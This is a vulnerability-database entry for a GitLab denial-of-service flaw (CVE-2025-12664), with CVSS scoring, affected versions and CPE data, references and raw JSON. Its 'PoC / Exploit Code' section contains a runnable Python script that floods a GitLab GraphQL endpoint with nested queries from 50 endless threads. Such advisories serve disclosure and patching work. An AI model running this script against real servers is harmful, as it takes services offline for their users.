Security Vulnerability Report
CVE-2025-12664 CVSS 7.5 HIGH

CVE-2025-12664

Published: 2026-04-08 23:16:56
Last Modified: 2026-04-14 17:05:00

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.0 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an unauthenticated user to cause denial of service by sending repeated GraphQL queries.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* (>= 13.0.0, < 18.8.9) - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* (>= 18.9.0, < 18.9.5) - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* (>= 18.10.0, < 18.10.3) - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* (>= 13.0.0, < 18.8.9) - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* (>= 18.9.0, < 18.9.5) - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* (>= 18.10.0, < 18.10.3) - VULNERABLE

Affected version ranges (CE and EE):
GitLab CE/EE >= 13.0, < 18.8.9
GitLab CE/EE >= 18.9, < 18.9.5
GitLab CE/EE >= 18.10, < 18.10.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import threading

# Target GitLab URL
target_url = "https://<gitlab-instance>/api/graphql"

# Malicious GraphQL query designed to consume resources
graphql_payload = {
    "query": """
    {
      projects {
        nodes {
          id
          name
          repository {
            blobs {
              nodes {
                id
              }
            }
          }
        }
      }
    }
    """
}


def send_attack():
    try:
        while True:
            response = requests.post(target_url, json=graphql_payload, timeout=5)
            print(f"Sent request, status: {response.status_code}")
    except Exception as e:
        print(f"Error: {e}")


# Launch multiple threads to simulate attack
for i in range(50):
    t = threading.Thread(target=send_attack)
    t.start()

References

https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/ (Vendor Advisory, Release Notes)
https://gitlab.com/gitlab-org/gitlab/-/work_items/579376 (Broken Link)
https://hackerone.com/reports/3377091 (Permissions Required)

Weakness: CWE-1284

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12664", "sourceIdentifier": "[email protected]", "published": "2026-04-08T23:16:56.200", "lastModified": "2026-04-14T17:04:59.650", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.0 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an unauthenticated user to cause denial of service by sending repeated GraphQL queries."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "13.0.0", "versionEndExcluding": "18.8.9", "matchCriteriaId": "48E564F7-CB57-4A79-A921-BA28CF67C623"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.9.0", "versionEndExcluding": "18.9.5", "matchCriteriaId": "5C4D8A99-6E70-4D55-9ACF-FF2620F070E0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.10.0", "versionEndExcluding": "18.10.3", "matchCriteriaId": "DBCB346F-0B28-458B-A453-29DA4B0E91FC"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", 
"versionStartIncluding": "13.0.0", "versionEndExcluding": "18.8.9", "matchCriteriaId": "69D195DE-D52F-4794-84F8-B88A736360A0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.9.0", "versionEndExcluding": "18.9.5", "matchCriteriaId": "3BA6A89D-D2C1-45B9-A8E8-64256816D880"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.10.0", "versionEndExcluding": "18.10.3", "matchCriteriaId": "BB2F3665-2451-4A4D-8538-93F540975F0E"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/", "source": "[email protected]", "tags": ["Vendor Advisory", "Release Notes"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/579376", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3377091", "source": "[email protected]", "tags": ["Permissions Required"]}]}}